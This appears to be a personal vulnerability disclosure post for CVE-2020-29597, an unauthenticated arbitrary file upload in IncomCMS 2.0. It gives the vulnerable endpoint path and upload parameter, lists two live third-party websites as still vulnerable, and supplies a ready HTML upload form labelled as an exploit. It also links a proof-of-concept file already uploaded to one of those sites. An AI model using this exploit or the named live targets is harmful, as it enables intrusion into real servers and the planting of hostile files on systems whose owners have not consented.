Avatar Hi there, I am Mohammed Fadhl Al-Barbari 18 y/o cyber security researcher , Web dev/tester, Mobile applications dev/tester, tools builder and Bugs hunter . Hacker since 2015

CVE-2020-29597 - IncomCMS 2.0 insecure files upload

Hi there!, I’ve discovered endpoint that accepts any file and upload it without any validation or even being authentication

Discovered by : Mohammed Fadhl Al-Barbari aka @m4dm0e

CVE-ID : CVE-2020-29597

Vulnerable endpoint/script : site.com/incom/modules/uploader/showcase/script.php

Vulnerability type : Insecure file upload

Tested on : IncomCMS 2.0 old versions probably vulnerable too

Uploader parameter : Filedata

Live websites :

http://mzgesheft.kz/incom/modules/uploader/showcase/script.php
http://mekom.kz/incom/modules/uploader/showcase/script.php

HTML exploit :

<!DOCTYPE html>
<html>
<head>
  <title>Upload your files</title>
</head>
<body>
  <form enctype="multipart/form-data" action="http://www.example.com/incom/modules/uploader/showcase/script.php" method="POST">
    <p>Upload your file</p>
    <input type="file" name="Filedata"></input><br />
    <input type="submit" value="Upload"></input>
  </form>
</body>
</html>

POCs : http://mzgesheft.kz/upload/userfiles/image/cve.png

Thanks for reading this.